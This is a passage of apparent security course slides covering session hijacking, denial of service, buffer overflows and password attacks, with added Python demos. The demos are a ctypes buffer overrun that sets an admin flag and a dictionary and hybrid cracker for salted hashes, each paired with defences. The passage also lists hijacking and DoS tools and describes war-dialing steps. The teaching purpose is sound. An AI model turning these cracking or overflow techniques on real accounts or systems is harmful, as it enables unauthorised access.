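    print("random ISN, blind:     ", blind_injection(random_isn))
```

The rejected `cat notes.txt` is the visible symptom on Bob's side: his client and the server now disagree about the sequence number, which is why the slide's attacker also takes the user offline with a denial of service rather than leaving him to notice.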

Session Hijacking Programs
  • Juggernaut
    • Network sniffer that can also be used for hijacking
  • Hunt
    • Can be used to listen, intercept and hijack active
      sessions on a network
  • TTY Watcher
    • Freeware program to monitor and hijack sessions
      on a single host
  • IP Watcher
    • Commercial session hijacking tool based on TTY Watcher

Session Hijacking Protection
  • Use Encryption
  • Prevents hacker from intercepting packets
  • Use a secure protocol for sensitive work
  • E.g. administering remote machines
  • Limit incoming connections
  • Minimize remote access
  • Strong authentication ineffective
  • Since the authentication is only done at
    beginning of the session

Denial of Service (DOS) Attack
  • Definition
  • Attack through which a person can render a system
    unusable or significantly slow down the system
    for legitimate users by overloading the system so
    that no one else can use it.
  • Types
  • Crashing the system or network
  • Send the victim data or packets which will cause
    system to crash or reboot.
  • Exhausting the resources by flooding the system
    or network with information
  • Since all resources are exhausted others are
    denied access to the resources
  • Distributed DOS attacks are coordinated denial of
    service attacks involving several people and/or
    machines to launch attacks

Denial of Service (DOS) Attack
  • Types
  • Ping of Death
  • SSPing
  • Land
  • Smurf
  • SYN Flood
  • CPU Hog
  • Win Nuke
  • RPC Locator
  • Jolt2
  • Bubonic
  • Microsoft Incomplete TCP/IP Packet Vulnerability
  • HP Openview Node Manager SNMP DOS Vulnerability
  • Netscreen Firewall DOS Vulnerability
  • Checkpoint Firewall DOS Vulnerability

DOS Attack - Protection
  • Effective robust design
    • Create redundant servers
    • Distribute your servers across different ISPs
  • Bandwidth limitations
    • Limit available bandwidth based on protocol
  • Keep systems patched
    • Prevents attacks where machines are crashed
  • Run the least amount of services
    • Limits the options of the hacker
  • Allow only necessary traffic
    • Prevents hacked machines from being used as launching
      pads for attacks
  • Block IP addresses
    • Once under attack, start blocking IP addresses at
      the firewall

Buffer Overflow Attacks
  • This attack takes advantage of the way in which
    information is stored by computer programs
  • An attacker tries to store more information on
    the stack than the size of the buffer
  • How does it work?

Buffer Overflow Attacks
  • Programs which do not have a rigorous memory
    check in the code, are vulnerable to this attack
  • Simple weaknesses can be exploited
  • If memory allocated for name is 50 characters,
    someone can break the system by sending a
    fictitious name of more than 50 characters
  • Can be used for espionage, denial of service or
    compromising the integrity of the data
  • Examples
  • NetMeeting Buffer Overflow
  • Outlook Buffer Overflow
  • AOL Instant Messenger Buffer Overflow
  • SQL Server 2000 Extended Stored Procedure Buffer
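The 50-character name example above, as an added example that is not part of the original slides, written in Python with ctypes so that it runs without a C compiler: a structure with a 50-byte name buffer followed immediately by an integer flag, a strcpy-like copy that runs past the buffer into the flag, and the bounds-checked version that refuses the same input. The LoginRecord layout and the is_admin flag are hypothetical, chosen to make the effect of the overrun visible.

```python
import ctypes

NAME_SIZE = 50   # the slide's 50-character name buffer


class LoginRecord(ctypes.Structure):
    """Two fields laid out back to back, exactly as a C struct would place them:
    the 50-byte name buffer and, immediately after it, a 4-byte integer flag."""
    _pack_ = 1
    _fields_ = [("name", ctypes.c_char * NAME_SIZE),
                ("is_admin", ctypes.c_int32)]


def unsafe_set_name(rec, data):
    """strcpy-style copy: writes every byte it is given, never asking how big the buffer is."""
    # Guard only so the demo cannot scribble past the structure and crash the interpreter;
    # a real strcpy has no such stop and keeps writing into whatever follows in memory.
    assert len(data) <= ctypes.sizeof(rec)
    ctypes.memmove(ctypes.addressof(rec), data, len(data))


def safe_set_name(rec, data):
    """Bounds-checked copy: refuses anything that does not fit with its terminating NUL."""
    if len(data) >= NAME_SIZE:
        raise ValueError(f"name longer than {NAME_SIZE - 1} bytes rejected")
    ctypes.memmove(ctypes.addressof(rec), data + b"\x00", len(data) + 1)


def process_login(name_bytes, setter):
    """Fill a fresh record with the supplied name and report what the program now believes."""
    rec = LoginRecord()
    rec.is_admin = 0                    # nobody is an administrator until the server says so
    try:
        setter(rec, name_bytes)
    except ValueError as err:
        return {"accepted": False, "name": rec.name, "is_admin": rec.is_admin, "error": str(err)}
    return {"accepted": True, "name": rec.name, "is_admin": rec.is_admin, "error": None}


# Constructed attack input: 50 bytes fill the name field, and the 4 bytes that follow land
# on is_admin, encoded in the machine's own byte order so the flag reads back as 1.
OVERLONG_NAME = b"A" * NAME_SIZE + bytes(ctypes.c_int32(1))

if __name__ == "__main__":
    print("unsafe copy:", process_login(OVERLONG_NAME, unsafe_set_name))
    print("safe copy:  ", process_login(OVERLONG_NAME, safe_set_name))
    print("normal name:", process_login(b"alice", safe_set_name))
```

The unsafe path never touched `is_admin` by name, yet it reads back as 1 afterwards: that is the whole attack in miniature. Where the bytes beyond the buffer are a saved return address rather than a flag, the same overrun redirects execution instead of flipping a privilege bit.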

Buffer Overflow Attacks - Prevention
  • Close port or service
  • Remove vulnerable software
  • Remove software no longer being used
  • Apply vendor patch
  • Update patches as soon as the vendor releases it
  • Filter specific traffic at the firewall
  • Once application is identified stop all requests
    to it
  • Test Key Applications
  • Test software for vulnerabilities
  • Run software in the least privilege required
  • Limits the exploitation capacity of the hacker

Password Attacks
  • A hacker can easily exploit weak passwords and
    uncontrolled network modems
  • Steps
    • Hacker gets the phone number of a company
    • Hacker runs a war dialer program
      • If the original number is 555-5532 he runs all
        numbers in the 555-55xx range
      • When a modem answers he records the phone number of
    • Hacker now needs a user id and password to enter the
      company network
      • Companies often have default accounts, e.g. temp,
        anonymous, with no password
      • Often the root account uses the company name as the
    • For strong passwords, password cracking techniques

Password Security
(Diagram: the typed password goes through a hash function; the hashed password is compared with the stored hashed password, and access is allowed or denied.)
  • Password is hashed and stored
  • A salt is added to randomize the password hash before it
    is stored on the system
  • Password attacks are launched to crack the stored (hashed) passwords

Password Attacks - Process
  • Find a valid user ID
  • Create a list of possible passwords
  • Rank the passwords from high probability to low
  • Type in each password
  • If the system allows you in success !
  • If not, try again, being careful not to exceed
    password lockout (the number of times you can
    guess a wrong password before the system shuts
    down and wont let you try any more)

Password Attacks - Types
  • Dictionary Attack
    • Hacker tries all words in a dictionary to crack the password
    • 70% of people use dictionary words as passwords
  • Brute Force Attack
    • Try all permutations of the letters and symbols in
      the alphabet
  • Hybrid Attack
    • Words from the dictionary and their variations are used
      in the attack
  • Social Engineering
    • People write passwords down in different places
    • People disclose passwords naively to others
  • Shoulder Surfing
    • Hackers slyly watch over people's shoulders to
      steal passwords
  • Dumpster Diving
    • People dump their papers in the garbage, which
      may contain information to crack passwords
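The hashing diagram, the guessing process and the dictionary/hybrid attack types above, as an added example that is not part of the original slides: salted PBKDF2 password storage in Python, an offline dictionary-plus-hybrid attack against a stolen hash table, and an online guessing attempt that runs into the lockout threshold. The user table, word list, iteration count and lockout value are constructed for the example; the iteration count is kept low so the demo runs in about a second and would be far higher in production.

```python
import hashlib
import hmac
import os

ITERATIONS = 10_000   # assumed: low for the demo; production uses a much larger count


def hash_password(password, salt=None):
    """Salt + slow hash (PBKDF2-HMAC-SHA256). Returns (salt, digest); the system stores both."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def verify_password(password, salt, digest):
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(hash_password(password, salt)[1], digest)


# Constructed demo user table, stored the way the slide's diagram describes.
DEMO_USERS = {
    "alice": hash_password("sunshine"),
    "bob":   hash_password("Sunshine1"),
    "carol": hash_password("sunshine"),                 # same password as alice
    "dave":  hash_password("T3a-Kettle!vortex-91"),     # not reachable from the word list
}

WORDLIST = ["password", "letmein", "sunshine", "dragon", "albany", "welcome"]   # constructed


def hybrid_variants(word):
    """A dictionary word plus the variations a hybrid attack tries: case, leet, common suffixes."""
    bases = [word, word.capitalize(), word.upper(), word.translate(str.maketrans("aeio", "4310"))]
    seen = set()
    for base in bases:
        for candidate in (base, base + "1", base + "123", base + "!", base + "2001"):
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def crack_offline(users=DEMO_USERS, wordlist=WORDLIST):
    """Offline attack on a stolen hash table. Because every user has a different salt,
    each guess costs one full PBKDF2 computation per user and nothing can be precomputed.
    Returns {user: (recovered password, number of guesses)} for the users that fell."""
    results = {}
    for user, (salt, digest) in users.items():
        guesses = 0
        for word in wordlist:
            for candidate in hybrid_variants(word):
                guesses += 1
                if verify_password(candidate, salt, digest):
                    results[user] = (candidate, guesses)
                    break
            if user in results:
                break
    return results


def online_guess(user, candidates, users=DEMO_USERS, lockout=5):
    """Online guessing against the login service: the slide's 'type in each password'
    loop, stopped by the lockout threshold before the list is exhausted."""
    salt, digest = users[user]
    for attempt, candidate in enumerate(candidates, 1):
        if verify_password(candidate, salt, digest):
            return {"status": "success", "password": candidate, "attempts": attempt}
        if attempt >= lockout:
            return {"status": "locked", "attempts": attempt}
    return {"status": "exhausted", "attempts": len(candidates)}


if __name__ == "__main__":
    print("salts differ for alice/carol:", DEMO_USERS["alice"][0] != DEMO_USERS["carol"][0])
    print("offline:", crack_offline())
    print("online: ", online_guess("bob", ["password", "letmein", "sunshine", "dragon", "albany", "Sunshine1"]))
```

Alice and Carol chose the same password but their stored digests differ, so cracking one tells the attacker nothing about the other and a precomputed table is useless; the offline attack still recovers every dictionary-derived password within a few dozen guesses, while Dave's passphrase survives the whole list. Online, the same list is stopped by the lockout after five tries.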

  • Computer Security is a continuous battle
  • As computer security gets tighter hackers are
    getting smarter
  • Very high stakes
  • Billions of dollars worth of business conducted
    on the internet